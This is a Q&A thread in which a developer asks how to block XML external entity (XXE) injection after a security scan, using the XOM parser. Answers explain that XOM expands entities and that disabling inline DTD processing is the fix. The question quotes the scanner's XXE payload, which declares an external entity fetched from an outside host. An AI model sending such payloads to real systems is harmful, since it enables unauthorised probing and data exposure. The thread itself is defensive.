How to restrict an ENTITY tag in xml file using xsd

Question

I have am xml code as below:

  <request><param name=\"client-id\" value=\"organization\"/><param name=\"client-org-id\" value=\"3042d80e24cd4cc31eb9ef48e7012\"/><param name=\"user-agent\" value=\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0\"/><param name=\"client-browser\" value=\"Firefox 48\"/><param name=\"domain-id\" value=\"layout\"/><param name=\"view-id\" value=\"1\"/><param name=\"view-token\" value=\"layout|get-workspace|\"/><param name=\"view-action\" value=\"private.layout:get-workspace\"/><param name=\"view-parent-id\" value=\"\"/><param name=\"view-parent-token\" value=\"\"/><param name=\"view-parent-action\" value=\"\"/></request>

and here i am getting the above xml as string and i am using XOM parser to parse the xml. Now my problem is my application gone through security scan and the parameter through which i am getting the XML string is injecting an external XML as below:

<?xml version=\"1.0\" encoding=\"utf-8\"?><!DOCTYPE acunetix [><!ENTITY acunetixent SYSTEM \"http://hitrlWBrzWDQ0.bxss.me/\">]><xxx>&acunetixent;</xxx>

So i want to prevent the external entity. What is the best solution for me. Or any solution for avoiding the ENTITY tag in xml when parsing the XML using xsd. Thanks in advance.

score 1 · Answer 1 · answered Sep 21 '16 at 09:46

1

I fear that you cannot do it in XOM

In http://www.xom.nu/infoset.xhtml, you can read

All entity references are expanded. XOM does not allow unexpanded entity references.

answered Sep 21 '16 at 09:46

innovimax

440
5
8

Thank you for this information. Can please suggest some solution for this situation. – Debabrata Sahoo Sep 21 '16 at 09:51

score 0 · Answer 2 · edited May 23 '17 at 10:27

First of all, what you've posted in not XML. You must remove all of the backslash \ characters preceding double quote characters " in order for what you've posted to be well-formed.

So i want to prevent the external entity.

If by this you mean that you want to prevent the external entity from being injected into your XML, then we can't possibly help you because presumably neither we nor you have any control over the security scan that is injecting it.

If by this you mean that you want to prevent the entity reference from being expanded, realize that XML parsers are supposed to expand the entity reference and generally provide no way to override this behavior. @innovimax (+1) has already documented that XOM does not. See here for a hack in XSLT when the entity references are known in advanced.

Note finally that in either interpretation of your request, XSD plays no part.

Note that parsing inline DTD leads to security vulnerabilities, like for example XXE or "billion laughs" (see https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing ), and the security best practice is to disable inline DTD processing, as an attacker could add his DTD to any XML processed from user input. — Gabor Lengyel, Sep 21 '16 at 12:45

How to restrict an ENTITY tag in xml file using xsd

2 Answers2